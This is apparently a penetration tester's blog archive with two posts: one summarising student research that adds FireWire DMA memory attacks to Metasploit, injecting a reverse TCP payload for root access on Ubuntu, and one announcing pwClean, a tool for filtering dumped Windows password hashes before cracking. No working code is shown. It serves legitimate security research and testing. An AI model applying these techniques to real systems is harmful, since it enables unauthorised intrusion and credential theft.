Archive for the Tools Category

Integrating DMA attacks into Metasploit

Posted in Research, Security, Tools on 2012/03/09 by mram

Note 1: this is not my research. I only (co)supervised MSc students Albert Spruyt and Rory Breuk.
Note 2: the work was done in only five weeks, including reporting. More updates may follow when the guys find some time to work on it a bit more.


DMA attacks are oldskool, but hard to perform as no modern tool allows for it easily. Also, the oldskool attacks were limited to bypassing the login screen (Windows GINA) and searching for keys through memory. Some small patches were made for other operating systems besides the original winlockpwn for Windows XP and Vista, but the bottom line is that the attack has lost awareness since it’s first appeared a few years back. A nice overview of all DMA related research and attacks over the years can be found here.

The idea for this research came when I was once again fiddling with old linux kernels and old python code to successfully attack a client’s laptop during a security test with winlockpwn. I thougth “Wouldn’t it be cool if we could update the whole DMA attack thing to run on modern systems and integrated it into Metasploit so we could use all goodness Metasploit has to offer like payload selection, session control, etc”? Unable to find the time myself, I was doomed to keep using the old tooling.

But luckily I’m in good contact with the University of Amsterdam (System and Networking Engineering education) and was able to submit the topic for research by their MSc students. Rory Breuk and Albert Spruyt selected the topic and the research could start. They did the theoretical research and also created proof of concept code. Their paper can be found here, their presentation here, and their PoCs here. Oh, the PoC is called MOFO (Metasploit Over Firewire Ownage). With such a name it just has to be awesome ;-)

The PoC include two attacks:

  • Payload insertion via Metasploit: use Metasploit to prepare a reverse_tcp payload, connect to the target system via firewire, hit ‘exploit’ to insert the payload into memory, unplug firewire gear and walk away. Once the user gets back to the Ubuntu system and logs in, the injected code gets triggered and a reverse tcp connection is made via the network back to the attacker’s machine. In the case of Ubuntu 11.10 (the only supported OS at this moment), your you will have root-level control as LightDM runs as root. This all happens transparent to the end user. See screenshot below for attacker’s point of view.
  • Session control over DMA: connecting two machines via firewire, launch PoC code and the attacking system can issue commands on the target system, all via firewire + DMA.

You can find more details in their paper. The paper also includes ideas for future research on this topic, like how to implement multi stage payloads (meterpreter FTW!). So if you are interested, make sure to have a look.

Welcome additions to the code would be to have it ready for Windows systems and to have multi stage payloads like meterpreter supported. But the main message is that Albert and Rory have shown that it is possible to integrate DMA attacks into Metasploit. Great research, kudos for them!

Happy hacking!

[TOOL] pwClean – cleaning your password dump files

Posted in Security, Tools on 2010/09/24 by mram

I finally picked up some code I had lying around and finally created something useful with it. Not a big thing, just a simple tool that you can use to remove useless accounts and password hashes from the output of your favorite password dumping tool (pwdump, fgdump, gsecdump, etc.)

Skip the blabla and go straight to the Tools section.


So, you are doing a pentest and got several system rooted, maybe even a domain controller. One of the steps after compromise is getting the password hashes to get them cracked. Knowing the passwords in stead of only the hashes is an important step as it can for example provide you with access to that important financial application that is not AD-integrated.


But now you have got this text file with over 100K lines of password hashes. Sorting of the hashes before cracking is essential as your favorite tool dumps the hashes of many, many accounts that you are not interested in (system accounts, built-in, history, etc).

You can filter by hand or use your favorite text editor. But you need it to be faster, easier.


Introducing pwClean: a simple yet effective Windows application that helps you with exactly this problem: sorting the files with password hashes.

Using pwClean

Using pwClean to select Administrative accounts: contain 'adm' and in this case also '-a'


  • independent for password dumping tool used (support for pwdump, pwdumpX, gsecdump, fgdump);
  • graphical user interface for easy clicky-click (I know you windows pentesters like that);
  • can select administrative accounts identified by *adm*;
  • lets you select your domain specific ‘admin’ tag, e.g. if the naming convention uses ‘oper_<name>’ you enter ‘oper_’ as the admin identifier;
  • can remove system accounts (the accounts with the trailing $);
  • can remove built-in accounts like Guest, krbtgt, SUPPORT_388945a0, HelpAssistant, TSInternetUser, IWAM_* and IUSR_*;
  • can remove history accounts (_hist or _1) and wil remove the ‘(current)’ tag;
  • supports multiple input files.

Not yet implemented:

  • removal of accounts of which only the SID is know and not the name (orphaned/deleted accounts with the long numbers instead of an account name)
  • drag ‘n drop

Download link can be found in theĀ  section ‘Tools and Papers‘.

Let me know any comments if you have any.